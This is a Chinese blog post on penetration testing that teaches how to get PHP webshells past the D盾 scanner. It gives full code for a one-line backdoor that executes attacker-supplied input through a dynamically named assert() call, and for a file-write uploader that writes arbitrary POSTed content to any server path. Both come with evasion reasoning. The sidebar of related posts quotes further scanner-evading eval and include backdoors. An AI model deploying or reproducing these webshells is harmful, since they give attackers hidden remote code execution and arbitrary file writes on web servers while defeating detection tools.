渗透测试-过D盾一句话+上传小马

已于 2023-01-20 00:32:12 修改
阅读量1.4k 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全
于 2022-08-29 23:58:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126573986
版权

过D盾一句话+上传小马

文章目录

前言

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

方式一

PHP一句话马

1.代码

<?php class test{ function assert(){ // 方式一 //$a = getenv('HTTP_E'); //return $a; // 方式二 $a = substr(__FUNCTION__,0,6); return $a; } function foo(&$var) { $var = $_GET['a']; return $var; } } $a = new test(); $c = $a->assert(); $d = ""; $d = $a->foo($d); $c($d);?>

2.免杀思路
getenv 能够获取 phpinfo 中 ApacheEnvironment 和 Environment 中的值。
请求头中的变量会以 HTTP_变量名 的形式存在 Apache Environment 中。
因此我们在请求头中带上 E: assert,我们可以通过 getenv(‘HTTP_E’) 来获取其值。
在这里插入图片描述

方式二

一般webshell是通过文件内容来查杀,因此我们可以利用一切非文件内容的可控值来构造webshell, 这里使用魔术常量获取到函数名,作为函数值返回。
免杀效果
在这里插入图片描述

PHP上传小马

  1. 代码
<?php header("content-type:text/html;charset=utf-8"); class test { function test() { return '干扰类'; } } @$rode = $_POST['rode']; @$content = $_POST['content']; if(@file_put_contents($rode,$content)) { echo '上传成功'; } ?> 小马路径<?php echo ':' . __FILE__;?>
上传路径:
内容:
  1. 免杀思路
    通过定义类的方式,干扰D盾的判断,从而绕过。

免杀效果
在这里插入图片描述

炫彩@之星
关注
专栏目录
一款过d盾PHP小马
shadowwolf’s blog
12-14 375
<?php $_='%99%88%8D%96%8B%9A'; $pass='a'; $rand_=rand(); $a=$_POST[$pass]; $file=md5('shadowwolf'); $shell='<?php '.$a.' ?>'; $myfile = fopen($file, "w"); (~urldecode($_))($myfile, $shell); include $file; 可以自己测测看啊
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3300
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
php_webshell免杀--从0改造你的AntSword
无问社区的博客
07-19 1446
关于蚁剑的介绍,这⾥就不多说了,⼀个连接webshell的管理器,使⽤前端nodejs进⾏编码。返回来的是默认蚁剑的默认流量,所以的话,这⾥就基本上过不去态势感知和waf,所以很容易想到了编码器和解码器的选择,可以进⾏流量的改造来进⾏waf的绕过,先选⽤Y默认的base64进⾏测试。经过加密之后,可以发现,进⾏了goto的混淆,所以这⾥就达到了代码混淆。为什么会有改造蚁剑的想法,之前看到有做冰蝎的流量加密,来看到绕过waf,改造⼀些弱特征,通过流量转换,跳过密钥交互。所以这⾥还需要进⾏代码混淆。
绕过D盾D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
实习Day7
最新发布
gwy13290049193的博客
09-05 959
冰蝎与webshell建立连接的同时,java也与目的主机建立tcp连接,每次连接使用本地端口在49700左右(就是比较大的端口),每连接一次,每建立一次新的连接,端口就依次增加。,在Windows系统中我们无法创建后缀带空格的文件,但是在数据包中不会对后缀的空格进行清除,需要使用到BP进行抓包,对其进行修改,然后再进行上传。使用长连接,避免了频繁的握手造成的资源开销。:检查Web服务器的访问日志和错误日志,这些日志中可能包含有关文件上传操作的信息,如上传的文件名、上传时间以及可能的目标路径。
绕过D盾一句话
03-05 5749
一个很简单的一个技巧,作个笔记,可以绕过D盾检测。 新建test1.php &lt;?php eval($_POST[g]); ?&gt; 新建test2.php &lt;?php $a="$_POST[g]"; eval($a=$a); ?&gt; 使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。 那么问题就出现...
安全狗/D盾/360的PHP一句话木马与防范方法
主题模板站的博客
01-29 900
D盾,他不认识二维数组,所以就很轻松绕过了。对了 还有360哦~ 测试了下安全狗,也查不出来,,。防御方法:就是网站下载下来这些php文件,然后通过字符串查找,类似上面的字符。本文阐述了过安全狗/D盾/360的PHP一句话木马,欢迎大家多多指点。过D盾很容易,当然下面还提供一个0等级就的。这样改,立马就变成1个等级的了。过D盾PHP一句话木马。
一个过D盾的php小马
https://www.cnblogs.com/zpchcbd/
04-29 1690
这里给大家分享一个自己写的过D盾的马 <?php class ade { static $name = 'ceshi'; function __construct($name) { self::$name = $name; @eval(Null.self/**/::$name.Null); } } new ade($_POST[1]); 这里主要注意的一点的是$name...
网络安全笔记-99-渗透-文件上传
wwxxee
01-05 1145
文件上传漏洞 漏洞概述 文件上传Web 应用的必备功能之一,比如上传头像显示个性化、上传附件共享文件、上传脚本更新网站。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件、exe 程序等,这就造成了文件上传漏洞。 漏洞成因 服务器配置不当 对上传文件没有限制 没有考虑系统特性和验证以及过滤不严格导致限制被绕过 漏洞危害 非法用户可以利用上传的恶意脚本文件控制整个网站,甚至可以控制服务器。这个恶意脚本文件被称为webshell,也可以将webshell脚本称为一个
html c ashx,探索基于.NET下实现一句话木马之ashx篇
weixin_36168629的博客
06-21 575
0x01 前言在渗透测试的时候各种PHP版的一句话木马已经琳琅满目,而.NET平台下的一句话木马则百年不变,最常见的当属下面这句想必这句话已经成大多数防御产品的标准样本,除此以外还有上传文件的一句话,像这种的从严格意义上不能算是一句话木马,只是一个简单的上传文件的功能,实际的操作还是大马或者小马的操作行为。笔者感觉有必要挖坑一下.NET平台里的一句话木马,经过一番摸索填坑终于可以总结出了.NET下...
Vulnhub靶机Five86-2渗透笔记
liver100day的博客
09-11 591
文章目录1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 目录爆破3.漏洞利用3.1 查找有关WordPress 5.1.4版本的漏洞3.2 WPscan 破解账户密码3.3 反弹shell第一步:生成一句话木马文件第二步:压缩一句话木马文件第三步:上传压缩文件并获取shell4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:Five86-2 IP地址未知 靶机下载地址:http://www.
php大马过安全D盾和云锁
04-10
php大马过安全D盾和云锁
PHP过D盾免杀小马.zip
06-14
提供混淆以及未混淆两个文件,可以随意过D盾,可用菜刀直接连接!
个人发卡网(完全无后门)可过D盾扫描
09-12
0后门。放心使用,经过D盾扫描0后门。不放心可以自己用D盾扫描一下后门
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
绕过D盾一句话
Home to come
04-16 1112
通过网上各种渠道搜索,我一共上传了16个php文件,只有两个文件成功绕过了D盾 1. <?php eval('' . get() . ''); /** * @return string */ function get() { $get = $_GET['password']; return $get; } <?php $a=1;$b="a=".$_GE...
.Net网站webshell 401?403?D盾拦截?一招内存马直接搞定
qax
01-31 2349
在参加某次公司项目时,在碰到一个.NEt的通用系统,通过审计发现了两个文件上传漏洞,网站管理员发现网站被上传webshell后,最开始是修改了网站的配置文件,导致脚本文件禁止执行,后来通过上传web.config的方式给绕过了,但是后面管理员又给服务器装了D盾安全狗,天擎,导致上传的文件无法正常解析,尝试了各种免杀的aspx马,都是提示禁止执行脚本文件,最后通过加载内存马的方式绕过了D盾的检测。
php一句话-D盾绕过小技巧
zzgslh的博客
03-05 6055
php一句话-D盾绕过小技巧,Platypus多会话的交互式反向 Shell 管理器
PHP小马免杀技巧:绕过D盾解析
"PHP小马免杀的浅谈[过最新D盾]1" 本文主要讨论的是如何在PHP环境中创建和执行免杀(即避免安全检测工具检测)的小马(恶意代码),特别是针对最新版本的D盾防御系统。作者分享了两种主要的绕过策略。 策略一:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值